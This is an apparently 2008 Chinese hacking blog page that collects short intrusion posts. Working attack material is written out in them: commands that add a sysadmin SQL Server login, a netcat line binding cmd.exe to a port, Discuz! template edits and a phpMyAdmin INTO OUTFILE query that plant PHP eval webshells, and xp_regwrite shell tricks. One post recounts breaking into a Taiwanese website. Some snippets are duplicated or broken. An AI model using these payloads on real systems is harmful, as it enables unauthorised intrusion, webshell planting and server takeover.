★→切换到: ∑
微软 NSLOOKup.exe 被报存在0 day 漏洞,攻击者主动应用该漏洞将引起主机拒绝服务或执行任意代码.微软表示正在调查此漏洞.
含技术演示.
访问: 漏洞演示 http://www.nullcode.com.ar/ncs/crash/nsloo.swf
[欢迎光临] : 提示:如果你觉得音乐太吵闹,请你选择下面静音版浏览博客。
中国知音在线 http://Online.bycnboy.com
[最新微软漏洞] NSLOOKup 存在0day漏洞+演示
作者:中国知音 日期:2008-08-31
[最新漏洞] Discuz!NT 2.5(20080826更新前)注入
作者:中国知音 日期:2008-08-31
[最新漏洞] Discuz!NT 2.5(20080826更新前)注入
漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
漏洞厂商:http://www.comsenz.com
漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。
[技术文章] CMD下加sql账号--入侵新手法
作者:中国知音 日期:2008-06-18
[技术文章] CMD下加sql账号--入侵新手法
这个服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下:
echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry
echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry
看完后立马去试了一下,居然真的成功了,可是由于溢出,服务器的sql服务已经停止,只好等它下次启动时再运行了。不过对我来说,这种加sql账号的方法还是第一次,所以得拿出来记一下,以备以后还有能用得着的时候,呵呵。
[技术共享] 一个空间多个域名
作者:中国知音 日期:2008-06-17
[技术共享] 一个空间多个域名
有时候买一个虚拟空间,足可以放N个站点,一般只要把各站点的对应域名都绑在这个虚拟空间的IP上,然后使
用以下代码便可实现空间共享,站点独立 的效果,相信下面这段简单的代码很容易理解的。
我们以ASP为例:
程序代码
<%if Request.ServerVariables("SERVER_NAME")="www.55130.cn" then
response.redirect "kang/index.asp"
elseif Request.ServerVariables("SERVER_NAME")="www.55130.cn" then
response.redirect "kang/index.asp"
else
[技术] ASP+MS SQL在线修改Serv-u的密码
作者:中国知音 日期:2008-06-17
[技术] ASP+MS SQL在线修改Serv-u的密码
针对一些虚拟主机管理软件 的确应该去深入了解 :)
下面是以Serv-U 6.0和Sql Server 2000相结合的演示。
建表Sql 语句:
Create TABLE [groupaccounts] (
[id] int IDENTITY (1,1) PRIMARY KEY,
[Index] int Default 0,
[Name] nVarChar(50) default '''''''',
[Notes] nVarChar(255) default ''''''''
)
Create INDEX [Name] on [groupaccounts]([Name] )
Create TABLE [groupdiraccess] (
[id] int IDENTITY PRIMARY KEY,
[Access] nVarChar(255) default '''''''',
[Index] int Default 0,
[Name] nVarChar(50) default ''''''''
)
Create INDEX [Name] on [groupdiraccess]([Name] )
Create TABLE [groupipaccess] (
[id] int IDENTITY PRIMARY KEY,
[Access] nVarChar(255) default '''''''',
[Index] int Default 0,
[Name] nVarChar(50) default ''''''''
)
Create INDEX [Name] on [groupipaccess]([Name] )
[提权] Serv-U提权之CMD下提权命令
作者:中国知音 日期:2008-05-15
[益出提权] MS08-025 for win2k & win2k3
作者:中国知音 日期:2008-05-13
[提权技术] Mssql Db_owner角色注入直接获得系统权限
作者:中国知音 日期:2008-05-07
[提权技术] Mssql Db_owner角色注入直接获得系统权限
相信大家对ASP+MSSQL注入都已经很熟悉了,连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手,如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下,好像也无技可施;除了用备份得到shell的这个思路,我在网上实在没有找出更好的入侵办法。不过,备份得到的shell只是理论化的东东,如果一个webshell有20mb的话,你还能用它吗?前不久,我就碰到了这样的一个台湾网站,管理员的密码倒是用NBSi跑了出来,可是用户名因为是繁体的原因在NBSi中成了一堆乱码。我也找到了后台,可只有干瞪眼的份。怎么办?我又扫了它的所有端口,发现开了5900,估计是管理员用了VNC对服务器进行了远程控制。这时,我就有一个思路,能不能把VNC在注册表的加密密码读出来再来破解呢?看我表演吧!
[提权技术] nc反弹cmdshell
作者:中国知音 日期:2008-05-06
[提权技术] nc反弹cmdshell
上传NC,进行反弹连接。
命令说明:
nc -l -p 110 -t -e c:\winnt\system32\cmd.exe
-l 监听本地入栈信息
-p port 打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
C:\RECYCLER\cmd.exe
C:\RECYCLER\nc -l -p 110 -t -e c:\winnt\system32\cmd.exe
C:\RECYCLER\nc -l -p 110 -t -e C:\RECYCLER\cmd.exe
接下来留给我们的空间就比较充足了,我们可以添加管理员后开接对方3389,(如果没有开放我们可以手动放开)还可以直接上传木马等等...
命令说明:
nc -l -p 110 -t -e c:\winnt\system32\cmd.exe
-l 监听本地入栈信息
-p port 打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
C:\RECYCLER\cmd.exe
C:\RECYCLER\nc -l -p 110 -t -e c:\winnt\system32\cmd.exe
C:\RECYCLER\nc -l -p 110 -t -e C:\RECYCLER\cmd.exe
接下来留给我们的空间就比较充足了,我们可以添加管理员后开接对方3389,(如果没有开放我们可以手动放开)还可以直接上传木马等等...
Tags: 提权
[提权技术] Discuz! 6 后台拿Shell的方法
作者:中国知音 日期:2008-04-27
[提权技术] Discuz! 6 后台拿Shell的方法
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:
[黑客技巧] phpMyAdmin 后台拿webshell
作者:中国知音 日期:2008-02-09
[黑客技巧] phpMyAdmin 后台拿webshell
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
[黑客宝典] Gene6 FTP 提权方法
作者:中国知音 日期:2008-02-09
[黑客宝典] 当网站不允许上传时
作者:中国知音 日期:2008-02-09
[提权技术] root提权
作者:中国知音 日期:2008-02-09
[SA入侵] SA权限仅需xp_regwrite即可有dos shell
作者:中国知音 日期:2008-01-28
[SA入侵] SA权限仅需xp_regwrite即可有dos shell
SA权限仅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠,不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
如果有回显,可以看到执行返回结果,否则需要先判断主机OS类型再试
[SA提权知识] SQL Server SA空口令的渗透测试
作者:中国知音 日期:2008-01-28
[SA提权知识] SQL Server SA空口令的渗透测试
前几天朋友找我,让我帮忙测试一下他们的服务器,经过扫描后发现SQLServer的SA为空,决定利用这个漏洞做渗透测试。经过测试发现存储过程Xp_cmdshell以及读取注册表系列的存储过程都被删除了,并且Xplog70.dll也被删除,所以无法执行CMD命令和克隆管理员帐号了,看样子是经过安全配置的,这种情况据我当时掌握的知识是没办法入侵的。以前也遇到过类似的机器,所以决定利用几天的时间解决这个问题。
![[心情随笔 ]](images/icons/15.gif){kind=icon}
![[友情连接] 欢迎你!!](images/icons/21.gif){kind=icon}
![[工具下载 感觉实用的..]](images/icons/23.gif){kind=icon}
网 名;中国知音
